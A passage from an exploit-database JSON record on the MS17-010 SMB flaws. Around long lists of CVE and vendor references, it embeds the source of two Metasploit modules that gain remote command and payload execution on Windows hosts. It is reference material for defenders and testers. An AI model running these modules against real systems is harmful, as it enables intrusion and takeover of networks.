"CVE-2017-0147"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", 
"THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147", "MS:CVE-2017-0143", "MS:CVE-2017-0146"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}], "modified": "2020-10-13T19:19:22", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-10-13T19:19:22", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include 
Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => '2017-03-14',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptPort.new('RPORT', [true, 'The Target 
port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, delay: datastore['DELAY'], retries: datastore['RETRY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => 
datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e6f53676ca888a6a837a24417efa2477"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "0762dab7827371d2474b2f3149cd5d38"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e80bef8ab7c34172a2f61c17200cdbec"}, {"key": "published", "hash": "b1b79302e85cd03f0ea3818121409a3e"}, {"key": "references", "hash": "7bc839b0566b34ac03da233f997066ff"}, {"key": "reporter", "hash": 
"74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "7bf92dcded785b5598f61cda83fdc26f"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "hash": "449b38dc690763656e56bd6e594e9633aa16975df48c4aab6139c279dd7e8b4c", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "published": "2018-01-29T01:13:25", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147"], "lastseen": "2020-10-07T20:08:39", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a 
write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-07T20:08:39", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], 
"type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", 
"QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-07T20:08:39", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "86bc26b94be4fda7496f9365ab40936b61d967769788ad706c71459a547733aa", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "47b769fdc546934555b5b0069a032cde", "key": "description"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "7bc839b0566b34ac03da233f997066ff", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e80bef8ab7c34172a2f61c17200cdbec", "key": "modified"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "b1b79302e85cd03f0ea3818121409a3e", "key": "published"}, {"hash": "0f387fb9bc28015146a12fe47c73e11c", "key": "title"}, {"hash": "e6f53676ca888a6a837a24417efa2477", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "immutableFields": [], "lastseen": "2020-10-07T20:08:39", "modified": "2020-10-02T20:00:37", "objectVersion": "1.5", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", 
"viewCount": 1997}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-07T20:08:39"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2018-05-11T21:18:06", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "metasploitReliability": "Normal", "modified": "2018-04-25T03:26:54", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. 
This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n [ 'AKA', 'ETERNALSYNERGY' ],\n [ 'AKA', 'ETERNALROMANCE' ],\n [ 'AKA', 'ETERNALCHAMPION' ],\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n end\n\n def exploit\n begin\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn()\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'])\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 108}, "differentElements": ["modified", "sourceData"], "edition": 20, "lastseen": "2018-05-11T21:18:06"}, {"bulletin": {"bulletinFamily": "exploit", 
"cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-03-07T18:25:39", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", 
"THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", 